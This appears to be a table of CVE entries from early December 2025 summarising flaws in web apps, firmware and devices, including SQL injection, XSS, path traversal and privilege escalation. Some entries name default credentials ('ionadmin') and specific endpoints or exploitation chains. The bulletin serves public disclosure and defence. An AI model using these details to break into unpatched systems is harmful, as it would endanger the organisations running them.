| n/a--HCL Technologies Limited HCLTech DRAGON before v.7.6.0 | An issue in HCL Technologies Limited HCLTech GRAGON before v.7.6.0 allows a remote attacker to execute arbitrary code via APIs do not enforcing limits on the number or size of requests | 2025-12-03 | not yet calculated | CVE-2025-63402 | http://hcltech.com http://hcl.com https://excalibur-hcl.my.salesforce.com/sfc/p/#U0000000YO14/a/Pf000003dyVd/ckzaFpdm68dwd1nWqgtLfXHp3Pim_YwLUI4WcRB__Ng |
| n/a--InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 for macOS | A local privilege escalation vulnerability exists in the InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 for macOS. The service accepts unauthenticated XPC connections and executes input via system(), which may allow a local user to execute arbitrary commands with root privileges. | 2025-12-03 | not yet calculated | CVE-2025-55076 | https://almightysec.com/plugin-alliance-helpertool-xpc-service-local-privilege-escalation/ |
| n/a--Kalmia CMS version 0.2.0 | Kalmia CMS version 0.2.0 contains a user enumeration vulnerability in its authentication mechanism. The application returns different error messages for invalid users (user_not_found) versus valid users with incorrect passwords (invalid_password). This observable response discrepancy allows unauthenticated attackers to enumerate valid usernames on the system. | 2025-12-04 | not yet calculated | CVE-2025-65899 | https://github.com/DifuseHQ/Kalmia https://github.com/Noxurge/CVE-2025-65899/blob/main/README.md |
| n/a--Kalmia CMS version 0.2.0 | Kalmia CMS version 0.2.0 contains an Incorrect Access Control vulnerability in the /kal-api/auth/users API endpoint. Due to insufficient permission validation and excessive data exposure in the backend, an authenticated user with basic read permissions can retrieve sensitive information for all platform users. | 2025-12-04 | not yet calculated | CVE-2025-65900 | https://github.com/DifuseHQ/Kalmia https://github.com/Noxurge/CVE-2025-65900/blob/main/README.md |
| n/a--KerOS prior 5.12 | The service wmp-agent of KerOS prior 5.12 does not properly validate so-called 'magic URLs' allowing an unauthenticated remote attacker to execute arbitrary OS commands as root when the service is reachable over network. Typically, the service is protected via local firewall. | 2025-12-01 | not yet calculated | CVE-2024-39148 | https://keros.docs.kerlink.com/security/security_advisories_kerOS5 https://www.bdosecurity.de/en-gb/advisories/cve-2024-39148 |
| n/a--LightFTP v2.0 | A buffer overflow in the g_cfg.MaxUsers component of LightFTP v2.0 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-01 | not yet calculated | CVE-2025-65403 | https://shimo.im/docs/9030JMJpv4IM4Nkw https://github.com/hfiref0x/LightFTP |
| n/a--Live555 Streaming Media v2018.09.02 | A buffer overflow in the getSideInfo2() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via a crafted MP3 stream. | 2025-12-01 | not yet calculated | CVE-2025-65404 | https://shimo.im/docs/16q8xMxpPlH8Z2q7 https://github.com/rgaufman/live555 |
| n/a--Live555 Streaming Media v2018.09.02 | A use-after-free in the ADTSAudioFileSource::samplingFrequency() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS/AAC file. | 2025-12-01 | not yet calculated | CVE-2025-65405 | https://github.com/rgaufman/live555 https://shimo.im/docs/25q5XMXpOwSr8w3D |
| n/a--Live555 Streaming Media v2018.09.02 | A heap overflow in the MatroskaFile::createRTPSinkForTrackNumber() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MKV file. | 2025-12-01 | not yet calculated | CVE-2025-65406 | https://github.com/rgaufman/live555 https://shimo.im/docs/1lq7rMrp8lI1vW3e |
| n/a--Live555 Streaming Media v2018.09.02 | A use-after-free in the MPEG1or2Demux::newElementaryStream() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MPEG Program stream. | 2025-12-01 | not yet calculated | CVE-2025-65407 | https://github.com/rgaufman/live555 https://shimo.im/docs/VMAPLVLpzZcZvoAg |
| n/a--Live555 Streaming Media v2018.09.02 | A NULL pointer dereference in the ADTSAudioFileServerMediaSubsession::createNewRTPSink() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS file. | 2025-12-01 | not yet calculated | CVE-2025-65408 | https://github.com/rgaufman/live555 https://shimo.im/docs/VMAPLVLp57SJ92Ag |
| n/a--long2ice assyncmy thru 0.2.10 | SQL injection vulnerability in long2ice assyncmy thru 0.2.10 allows attackers to execute arbitrary SQL commands via crafted dict keys. | 2025-12-02 | not yet calculated | CVE-2025-65896 | https://github.com/long2ice/asyncmy https://github.com/long2ice/asyncmy/issues/134 |
| n/a--Lvzhou CMS | Lvzhou CMS before commit c4ea0eb9cab5f6739b2c87e77d9ef304017ed615 (2025-09-22) is vulnerable to SQL injection via the 'title' parameter in com.wanli.lvzhoucms.service.ContentService#findPage. The parameter is concatenated directly into a dynamic SQL query without sanitization or prepared statements, enabling attackers to read sensitive data from the database. | 2025-12-02 | not yet calculated | CVE-2025-65877 | https://github.com/W000i/vuln/issues/1 |
| n/a--mJobtime v15.7.2 | mJobtime 15.7.2 handles authorization on the client side, which allows an attacker to modify the client-side code and gain access to administrative features. Additionally, they can craft requests based on the client-side code to call these administrative functions directly. | 2025-12-01 | not yet calculated | CVE-2025-51682 | http://mjobtime.com https://labs.infoguard.ch/advisories/cve-2025-51682_cve-2025-51683_time_management_softare_sqli-rce/ |
| n/a--mJobtime v15.7.2 | A blind SQL Injection (SQLi) vulnerability in mJobtime v15.7.2 allows unauthenticated attackers to execute arbitrary SQL statements via a crafted POST request to the /Default.aspx/update_profile_Server endpoint . | 2025-12-01 | not yet calculated | CVE-2025-51683 | http://mjobtime.com https://labs.infoguard.ch/advisories/cve-2025-51682_cve-2025-51683_time_management_softare_sqli-rce/ |
| n/a--open-webui v0.6.33 | open-webui v0.6.33 is vulnerable to Incorrect Access Control. The API /api/tasks/stop/ directly accesses and cancels tasks without verifying user ownership, enabling attackers (a normal user) to stop arbitrary LLM response tasks. | 2025-12-04 | not yet calculated | CVE-2025-63681 | https://github.com/open-webui/open-webui/blob/46ae3f4f5d7d4d706041bdae4ad2d802e568712b/backend/open_webui/main.py#L1652 https://github.com/TOAST-Research/pocs/blob/main/openwebui/arbitirary_task_stop/report.md |
| n/a--orderService.queryObject of platform v1.0.0 | Incorrect access control in the component orderService.queryObject of platform v1.0.0 allows attackers to access sensitive information via a crafted request. | 2025-12-04 | not yet calculated | CVE-2025-57213 | https://gitee.com/fuyang_lipengjun/platform https://gist.github.com/xueye0629/620e4e0cc0f23c903736971e6375f00e |
| n/a--Pepper language | A heap buffer overflow in compiler.c and compiler.h in Pepper language 0.1.1commit 961a5d9988c5986d563310275adad3fd181b2bb7. Malicious execution of a pepper source file(.pr) could lead to arbitrary code execution or Denial of Service. | 2025-12-03 | not yet calculated | CVE-2025-50360 | https://github.com/dannyvankooten/pepper-lang https://github.com/Ch1keen/CVE-2025-50360 |
| n/a--PHPGurukul Billing System 1.0 | PHPGurukul Billing System 1.0 is vulnerable to SQL Injection in the /admin/password-recovery.php endpoint. Specifically, the username and mobileno parameters accepts unvalidated user input, which is then concatenated directly into a backend SQL query. | 2025-12-02 | not yet calculated | CVE-2025-65379 | https://phpgurukul.com/billing-system-using-php-and-mysql/ https://github.com/dewcode91/security-research/blob/main/CVE-2025-65379.md |
| n/a--PHPGurukul Billing System 1.0 | PHPGurukul Billing System 1.0 is vulnerable to SQL Injection in the admin/index.php endpoint. Specifically, the username parameter accepts unvalidated user input, which is then concatenated directly into a backend SQL query. | 2025-12-02 | not yet calculated | CVE-2025-65380 | https://phpgurukul.com/billing-system-using-php-and-mysql https://github.com/dewcode91/security-research/blob/main/CVE-2025-65380.md |
| n/a--Plugin Alliance InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 on macOS | A local privilege escalation vulnerability exists in the Plugin Alliance InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 on macOS. Due to the absence of a hardened runtime and a __RESTRICT segment, a local user may exploit the DYLD_INSERT_LIBRARIES environment variable to inject a dynamic library, potentially resulting in code execution with elevated privileges. | 2025-12-03 | not yet calculated | CVE-2025-62686 | https://almightysec.com/plugin-alliance-installationhelper-dylib-injection/ |
| n/a--PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to SSRF. in the chat interface of SimpleAiAdminController. | 2025-12-01 | not yet calculated | CVE-2025-65836 | https://github.com/sanluan/PublicCMS https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/SSRF_1.md https://github.com/sanluan/PublicCMS/issues/99 |
| n/a--PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to path traversal via the doUploadSitefile method. | 2025-12-01 | not yet calculated | CVE-2025-65838 | https://github.com/sanluan/PublicCMS https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/RCE_1.md https://github.com/sanluan/PublicCMS/issues/101 |
| n/a--PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to Cross Site Request Forgery (CSRF) in the CkEditorAdminController. | 2025-12-01 | not yet calculated | CVE-2025-65840 | https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/CSRF_1.md https://github.com/sanluan/PublicCMS/issues/102 |
| n/a--Samsung Mobile Processor Exynos 1280 and 2200 | An issue was discovered in Camera in Samsung Mobile Processor Exynos 1280 and 2200. Unnecessary registration of a hardware IP address in the Camera device driver can lead to a NULL pointer dereference, resulting in a denial of service. | 2025-12-03 | not yet calculated | CVE-2025-54326 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54326/ |
| n/a--Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400 | An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. The function used to decode the SOR transparent container lacks bounds checking, which can cause a fatal error. | 2025-12-03 | not yet calculated | CVE-2025-53965 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-53965/ |
| n/a--Seafile Community Edition prior to version 13.0.12 | A stored cross-site scripting (XSS) vulnerability was discovered in Seafile Community Edition prior to version 13.0.12. When Seafile is configured with the Golang file server, an attacker can upload a crafted SVG file containing malicious JavaScript and share it using a public link. Opening the link triggers script execution in the victim's browser. This issue has been fixed in Seafile Community Edition 13.0.12. | 2025-12-04 | not yet calculated | CVE-2025-65516 | https://manual.seafile.com/latest/changelog/server-changelog/ https://gist.github.com/x0root/e5597622fede55b320d29a248dce01e6 |
| n/a--Shirt Pocket SuperDuper! V.3.10 | An issue in Shirt Pocket SuperDuper! V.3.10 and before allows a local attacker to execute arbitrary code via the software update mechanism | 2025-12-01 | not yet calculated | CVE-2025-61228 | http://shirt.com https://shirt-pocket.com/SuperDuper/SuperDuperDescription.html https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_security_update_v311/ |
| n/a--Shirt Pocket SuperDuper! V.3.10 | An issue in Shirt Pocket's SuperDuper! 3.10 and earlier allow a local attacker to modify the default task template to execute an arbitrary preflight script with root privileges and Full Disk Access, thus bypassing macOS privacy controls. | 2025-12-01 | not yet calculated | CVE-2025-61229 | http://shirt.com https://shirt-pocket.com/SuperDuper/SuperDuperDescription.html https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_security_update_v311/ |
| n/a--Shirt Pocket SuperDuper! v3.10 | Incorrect access control in the SDAgent component of Shirt Pocket SuperDuper! v3.10 allows attackers to escalate privileges to root due to the improper use of a setuid binary. | 2025-12-01 | not yet calculated | CVE-2025-57489 | http://shirt.com https://shirt-pocket.com/SuperDuper/SuperDuperDescription.html https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_security_update_v311/ |
| n/a--SmallBASIC with SDL Before v12_28 | Buffer Overflow was found in SmallBASIC community SmallBASIC with SDL Before v12_28, and commit sha:298a1d495355959db36451e90a0ac74bcc5593fe in the function main.cpp, which can lead to potential information leakage and crash. | 2025-12-03 | not yet calculated | CVE-2025-50361 | https://github.com/smallbasic/SmallBASIC https://github.com/Ch1keen/CVE-2025-50361 |
| n/a--Snipe-IT before 8.3.4 | Snipe-IT before 8.3.4 allows stored XSS, allowing a low-privileged authenticated user to inject JavaScript that executes in an administrator's session, enabling privilege escalation. | 2025-12-01 | not yet calculated | CVE-2025-65621 | http://snipeitapp.com https://github.com/firef0x00/vulnerability-research/tree/main/CVE-2025-65621 |
| n/a--Snipe-IT before 8.3.4 | Snipe-IT before 8.3.4 allows stored XSS via the Locations "Country" field, enabling a low-privileged authenticated user to inject JavaScript that executes in another user's session. | 2025-12-01 | not yet calculated | CVE-2025-65622 | http://snipeitapp.com https://github.com/firef0x00/vulnerability-research/tree/main/CVE-2025-65622 |
| n/a--SoftSea EPUB File Reader 1.0.0.0 | SoftSea EPUB File Reader 1.0.0.0 is vulnerable to Directory Traversal. The vulnerability resides in the EPUB file processing component, specifically in the functionality responsible for extracting and handling EPUB archive contents. | 2025-12-01 | not yet calculated | CVE-2025-63365 | http://epub.com https://jeroscope.com/advisories/2025/jero-2025-001/ |
| n/a--Sourcecodester Student Grades Management System v1.0 | Sourcecodester Student Grades Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the Add New Subject Description field. | 2025-12-02 | not yet calculated | CVE-2025-64070 | https://www.linkedin.com/in/vabna-lina-24ab17186/ https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-64070 |
| n/a--Sourcecodester Web-based Pharmacy Product Management System v1.0 | Sourcecodester Web-based Pharmacy Product Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /product_expiry/add-supplier.php via the Supplier Name field. | 2025-12-02 | not yet calculated | CVE-2025-65215 | https://www.linkedin.com/in/vabna-lina-24ab17186/ https://github.com/vabnamoni/CVE-Researches/blob/main/CVE-2025-65215 |
| n/a--Sourcecodester Zoo Management System v1.0 | Sourcecodester Zoo Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in /classes/Login.php. | 2025-12-02 | not yet calculated | CVE-2025-65881 | https://gist.github.com/MMAKINGDOM/17b85a6e077f08134ee96850f162ed8f https://github.com/MMAKINGDOM/CVE-2025-65881/ |
| n/a--Technitium through v13.2.2 | An issue in Technitium through v13.2.2 enables attackers to conduct a DNS cache poisoning attack and inject fake responses by reviving the birthday attack. | 2025-12-01 | not yet calculated | CVE-2024-56089 | https://technitium.com/dns/ https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md#version-134 |
| n/a--Tempus Ex hello-video-codec v0.1.0 | Improper input validation in the BitstreamWriter::write_bits() function of Tempus Ex hello-video-codec v0.1.0 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-01 | not yet calculated | CVE-2025-63095 | https://gist.github.com/thesmartshadow/b092e2493821491b981a069847a33064 https://github.com/tempus-ex/hello-video-codec https://github.com/tempus-ex/hello-video-codec/tree/3e9551c699311ea12ad7f2fce9562fbc990d524c https://github.com/tempus-ex/hello-video-codec/blob/3e9551c699311ea12ad7f2fce9562fbc990d524c/src/bitstream.rs |
| n/a--Terminalfour 8 through 8.4.1.1 | In Terminalfour 8 through 8.4.1.1, the userLevel parameter in the user management function is not subject to proper server-side authorization checks. A Power User can intercept and modify this parameter to assign the Administrator role to other existing lower-privileged accounts, or invite a new lower-privileged account and escalate its privileges. While manipulating this request, the Power User can also change the target account's password, effectively taking full control of it. | 2025-12-02 | not yet calculated | CVE-2025-58386 | https://terminalfour.com https://docs.terminalfour.com/release-notes/security-notices/cve-2025-58386/ |
| n/a--Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices | An issue was discovered on Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices. They run an SSH server accessible over the default port 22. The root account has a weak default password of ionadmin, and a password change policy for the root account is not enforced. Thus, an attacker with network connectivity can achieve root code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-04 | not yet calculated | CVE-2025-53963 | https://tools.thermofisher.cn/content/sfs/brochures/One_Touch_2_Spec_Sheet.pdf https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0014388_IonOneTouch2Sys_UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices | An issue was discovered on Thermo Fisher Ion Torrent OneTouch 2 INS1005527 devices. When they are powered on, an X11 display server is started. The display server listens on all network interfaces and is accessible over port 6000. The X11 access control list, by default, allows connections from 127.0.0.1 and 192.168.2.15. If a device is powered on and later connected to a network with DHCP, the device may not be assigned the 192.168.2.15 IP address, leaving the display server accessible by other devices on the network. The exposed X11 display server can then be used to gain root privileges and the ability to execute code remotely by interacting with matchbox-desktop and spawning a terminal. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-04 | not yet calculated | CVE-2025-54304 | https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0014388_IonOneTouch2Sys_UG.pdf https://www.thermofisher.com/order/catalog/product/4474779 https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1 | The Thermo Fisher Torrent Suite Django application 5.18.1 has weak default credentials, which are stored as fixtures for the Django ORM API. The ionadmin user account can be used to authenticate to default deployments with the password ionadmin. The user guide recommends changing default credentials; however, a password change policy for default administrative accounts is not enforced. Many deployments may retain default credentials, in which case an attacker is likely to be able to successfully authenticate with administrative privileges. | 2025-12-04 | not yet calculated | CVE-2025-54303 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1. | An issue was discovered in the Thermo Fisher Torrent Suite Django application 5.18.1. One of the middlewares included in this application, LocalhostAuthMiddleware, authenticates users as ionadmin if the REMOTE_ADDR property in request.META is set to 127.0.0.1, to 127.0.1.1, or to ::1. Any user with local access to the server may bypass authentication. | 2025-12-04 | not yet calculated | CVE-2025-54305 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1. | An issue was discovered in the Thermo Fisher Torrent Suite Django application 5.18.1. A remote code execution vulnerability exists in the network configuration functionality, stemming from insufficient input validation when processing network configuration parameters through administrative endpoints. The application allows administrators to modify the server's network configuration through the Django application. This configuration is processed by Bash scripts (TSsetnoproxy and TSsetproxy) that write user-controlled data directly to environment variables without proper sanitization. After updating environment variables, the scripts execute a source command on /etc/environment; if an attacker injects malicious data into environment variables, this command can enable arbitrary command execution. The vulnerability begins with the /admin/network endpoint, which passes user-supplied form data as arguments to subprocess.Popen calls. The user-supplied input is then used to update environment variables in TSsetnoproxy and TSsetproxy, and finally source $environment is executed. | 2025-12-04 | not yet calculated | CVE-2025-54306 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Thermo Fisher Torrent Suite Django application 5.18.1. | An issue was discovered in the Thermo Fisher Torrent Suite Django application 5.18.1. The /configure/plugins/plugin/upload/zip/ and /configure/newupdates/offline/bundle/upload/ endpoints allow low-privilege users to upload ZIP files to the server. The plupload_file_upload function handles these file uploads and constructs the destination file path by using either the name parameter or the uploaded filename, neither of which is properly sanitized. The file extension is extracted by splitting the filename, and a format string is used to construct the final file path, leaving the destination path vulnerable to path traversal. An authenticated attacker with network connectivity can write arbitrary files to the server, enabling remote code execution after overwriting an executable file. An example is the pdflatex executable, which is executed through subprocess.Popen in the write_report_pdf function after requests to a /report/latex/(\d+).pdf endpoint. | 2025-12-04 | not yet calculated | CVE-2025-54307 | https://www.thermofisher.com/us/en/home/life-science/sequencing/next-generation-sequencing/ion-torrent-next-generation-sequencing-workflow/ion-torrent-next-generation-sequencing-data-analysis-workflow/ion-torrent-suite-software.html https://assets.thermofisher.com/TFS-Assets/LSG/manuals/MAN0026163-Torrent-Suite-5.18-UG.pdf https://documents.thermofisher.com/TFS-Assets/CORP/Product-Guides/Ion_OneTouch_2_and_Torrent_Suite_Software.pdf |
| n/a--Todoist v8896 | Todoist v8896 is vulnerable to Cross Site Scripting (XSS) in /api/v1/uploads. Uploaded SVG files have no sanitization applied, so embedded JavaScript executes when a user opens the attachment from a task/comment. | 2025-12-01 | not yet calculated | CVE-2025-63317 | https://github.com/sefabasnak/Todoistv8896 |
| n/a--Warehouse Management System v1.2 | The warehouse management system version 1.2 contains an arbitrary file read vulnerability. The endpoint `/file/showImageByPath` does not sanitize user-controlled path parameters. An attacker could exploit directory traversal to read arbitrary files on the server's file system. This could lead to the leakage of sensitive system information. | 2025-12-05 | not yet calculated | CVE-2025-65878 | https://github.com/W000i/vuln/issues/2 |
| n/a--Warehouse Management System v1.2 | Warehouse Management System 1.2 contains an authenticated arbitrary file deletion vulnerability. The /goods/deleteGoods endpoint accepts a user-controlled goodsimg parameter, which is directly concatenated with the server's UPLOAD_PATH and passed to File.delete() without validation. A remote authenticated attacker can delete arbitrary files on the server by supplying directory traversal payloads. | 2025-12-05 | not yet calculated | CVE-2025-65879 | https://github.com/W000i/vuln/issues/3 |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to render the Administrator password in plaintext. | 2025-12-04 | not yet calculated | CVE-2025-63361 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-1/ |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 allows attackers to set the Administrator password and username as blank values, allowing attackers to bypass authentication. | 2025-12-04 | not yet calculated | CVE-2025-63362 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-2/ |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | A lack of Management Frame Protection in Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 allows attackers to execute de-authentication attacks, allowing crafted deauthentication and disassociation frames to be broadcast without authentication or encryption. | 2025-12-04 | not yet calculated | CVE-2025-63363 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-3/ |
| n/a--Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 | Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to transmit Administrator credentials in plaintext. | 2025-12-04 | not yet calculated | CVE-2025-63364 | https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing https://otsecverse.github.io/OTSecVerse/posts/Post-4/ |
| n/a--yzcheng90 X-SpringBoot 6.0 | This vulnerability fundamentally arises from yzcheng90 X-SpringBoot 6.0's implementation of role-based access control (RBAC) through dual dependency on frontend menu systems and backend permission tables, without enforcing atomic synchronization between these components. The critical flaw manifests when frontend menu updates (such as privilege revocation) fail to propagate to the backend permission table in real-time, creating a dangerous desynchronization. While users lose access to restricted functions through the web interface (as UI elements properly disappear), the stale permission records still validate unauthorized API requests when accessed directly through tools like Postman. Attackers exploiting this inconsistency can perform privileged operations including but not limited to: creating high-permission user accounts, accessing sensitive data beyond their clearance level, and executing admin-level commands. | 2025-12-04 | not yet calculated | CVE-2025-55948 | https://github.com/yzcheng90/X-SpringBoot https://github.com/liuchengjie01/vuln_db/blob/master/x-springboot3x-vul/x-springboot3x-vul.md |
| n/a--zdh_web thru 5.6.17 | zdh_web is a data collection, processing, monitoring, scheduling, and management platform. In zdh_web thru 5.6.17, insufficient validation of file upload paths in the application allows an authenticated user to write arbitrary files to the server file system, potentially overwriting existing files and leading to privilege escalation or remote code execution. | 2025-12-05 | not yet calculated | CVE-2025-65897 | https://github.com/zhaoyachao/zdh_web https://github.com/zhaoyachao/zdh_web/pull/39 https://github.com/zhaoyachao/zdh_web/commit/b2423378a8bf83f159f19ce4e14eac71c939793a https://github.com/zhaoyachao/zdh_web/issues/40 |
| Nagvis--Nagvis version before 1.9.48 | User enumeration in Nagvis' Checkmk MultisiteAuth before version 1.9.48 allows an unauthenticated attacker to enumerate Checkmk usernames. | 2025-12-03 | not yet calculated | CVE-2025-39665 | https://github.com/NagVis/nagvis/pull/411/commits/4acabcf9d5b2d26f390e760f59def8e163908d66 https://www.nagvis.org/downloads/changelog/1.9.48 |
| nopSolutions--nopCommerce | nopCommerce v4.70 and prior, and version 4.80.3, does not invalidate session cookies after logout or session termination, allowing an attacker who has a a valid session cookie access to privileged endpoints (such as /admin) even after the legitimate user has logged out, enabling session hijacking. Any version above 4.70 that is not 4.80.3 fixes the vulnerability. | 2025-12-01 | not yet calculated | CVE-2025-11699 | https://seclists.org/fulldisclosure/2025/Aug/14 https://github.com/nopSolutions/nopCommerce/issues/7044 https://www.nopcommerce.com/en/release-notes?srsltid=AfmBOoravPKjN19pm_XZbXZ7GvPhkt8cxlK6794BJRZlY5RxJU_yNoTT |
| Obi08/Enrollment System--Obi08/Enrollment System | Obi08/Enrollment System 1.0 contains a SQL injection vulnerability in the keyword parameter of /get_subject.php that allows unauthenticated attackers to execute arbitrary SQL queries. Attackers can use UNION-based injection to extract sensitive information from the users table including usernames and passwords. | 2025-12-04 | not yet calculated | CVE-2024-58276 | ExploitDB-51845 Official Product Homepage https://www.vulncheck.com/advisories/obi08-enrollment-system-10-loginphp-sql-injection |
| ObjectPlanet--Opinio | Cross-Site Request Forgery (CSRF) in the resource-management feature of ObjectPlanet Opinio 7.26 rev12562 allows to upload files on behalf of the connected users and then access such files without authentication. | 2025-12-02 | not yet calculated | CVE-2025-13871 | https://www.objectplanet.com/opinio/changelog.html |
| ObjectPlanet--Opinio | Blind Server-Side Request Forgery (SSRF) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on Web-based platforms allows an attacker to force the server to perform HTTP GET requests via crafted import requests to an arbitrary destination. | 2025-12-02 | not yet calculated | CVE-2025-13872 | https://www.objectplanet.com/opinio/changelog.html |
| ObjectPlanet--Opinio | Stored Cross-Site Scripting (XSS) in the survey-import feature of ObjectPlanet Opinio 7.26 rev12562 on web application allows an attacker to inject arbitrary JavaScript code, which executes in the browsing context of any visitor accessing the compromised survey. | 2025-12-02 | not yet calculated | CVE-2025-13873 | https://www.objectplanet.com/opinio/changelog.html |
| OpenSolution--QuickCMS | A Blind SQL injection vulnerability has been identified in QuickCMS. Improper neutralization of input provided by a high-privileged user into aFilesDelete allows for Blind SQL Injection attacks. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable. | 2025-12-02 | not yet calculated | CVE-2025-12465 | https://cert.pl/posts/2025/12/CVE-2025-12465/ |
| OpenVPN--OpenVPN | Insufficient argument validation in OpenVPN 2.7_alpha1 through 2.7_rc1 allows an attacker to trigger a heap buffer over-read when parsing IP addresses | 2025-12-01 | not yet calculated | CVE-2025-12106 | https://community.openvpn.net/Security%20Announcements/CVE-2025-12106 https://www.mail-archive.com/openvpn-announce@lists.sourceforge.net/msg00152.html |
